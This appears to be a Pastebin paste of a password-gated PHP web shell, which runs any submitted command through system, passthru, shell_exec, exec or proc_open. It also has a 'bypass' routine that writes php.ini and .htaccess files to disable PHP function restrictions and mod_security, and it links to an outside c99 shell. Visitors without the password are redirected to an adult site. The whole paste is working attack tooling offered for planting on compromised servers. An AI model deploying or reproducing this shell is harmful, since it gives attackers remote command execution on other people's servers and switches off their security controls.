Advertisement
0xspade

CMD Shell | Spade

Sep 13th, 2016
607
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.23 KB | None | 0 0
  1. <?php
  2.     if(!isset($_GET['spade'])){
  3.         echo 'Get Lost!';
  4.     }else{
  5.    
  6.     if($_GET['spade'] != 'azazel'){
  7.         echo '<meta http-equiv="refresh" content="0; URL=http://www.youjizz.com/">';
  8.     }else{
  9. ?>
  10. <head>
  11.     <title>CMD Shell</title>
  12. </head>
  13. <body style="background: black;color: green;font-family: 'Courier New','OCR A';">
  14. <center>
  15. <?php $disable_functions = @ini_get('disable_functions'); ?>
  16. <h3>Disabled Functions: ~$ <?php echo $disable_functions?$disable_functions:'All Functions Are Enabled :D';?></h3>
  17. <form method="POST" autocomplete="off" >
  18.             5p4d3@Localhost:~$ <input type="text" placeholder="What's On your Mind?!" name="command" style="outline: none;border: none;"/>
  19.         </form>
  20.         <textarea rows="25" cols="80" readonly style="text-align: left; color: red;resize: none;">
  21.         <?php
  22.             if(isset($_POST['command'])){
  23.             //system
  24.             if(function_exists('system')){
  25.             system($_POST['command']);
  26.             //passthru
  27.             }else if(function_exists('passthru')){
  28.             passthru($_POST['command']);
  29.             //shell_exec
  30.             }else if(function_exist('shell_exec')){
  31.             shell_exec($_POST['command']);
  32.             //exec
  33.             }else if(function_exists('exec')){
  34.             exec($_POST['command']);
  35.             //proc_open
  36.             }else if(function_exists('proc_open')){
  37.             proc_open($_POST['command']);
  38.             }
  39.         }          
  40.         ?>
  41.         </textarea>
  42. <?php if(is_writable(getcwd())){?>
  43.         <hr>
  44.         <form method="post">
  45.             <input type="submit" value="Bypass Dat Sh!t" name="bypass" />
  46.         </form>
  47. <?php
  48.     if(isset($_POST['bypass'])){
  49.         $php_ini = "safe_mode=OFF \ndisable_functions=NONE";
  50.         $htaccess = "<IfModule mod_security.c> \nSec------Engine Off \nSec------ScanPOST Off \n</IfModuleIfModule>";
  51.         $open = fopen("php.ini","w");
  52.         $htx = fopen(".htaccess","w");
  53.         if(fwrite($open, $php_ini) && fwrite($htx, $htaccess)){
  54.             echo "Bypassed ./.";
  55.            
  56.             fclose($open);
  57.             fclose($htx);
  58.            
  59.             }else{ echo "Cant Bypass This shits!";}    
  60.         }
  61.             }else{ echo "<p1 style='color: yellow;'>Directory is Not Writable!</p1><br /><a href='http://www.r57shell.net/shell/c99.txt'>Bypass Not Writable!</a>";} ?>
  62.            
  63.  
  64. <div style="text-align: center;position: absolute;bottom: 0;left: 0;background: black;color: red;width: 100%;">
  65.     <pre>Alright Reserved | Spade Pirates 2K16</pre>
  66. </div>
  67. </center>
  68. </body>
  69. <?php
  70. }}
  71. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement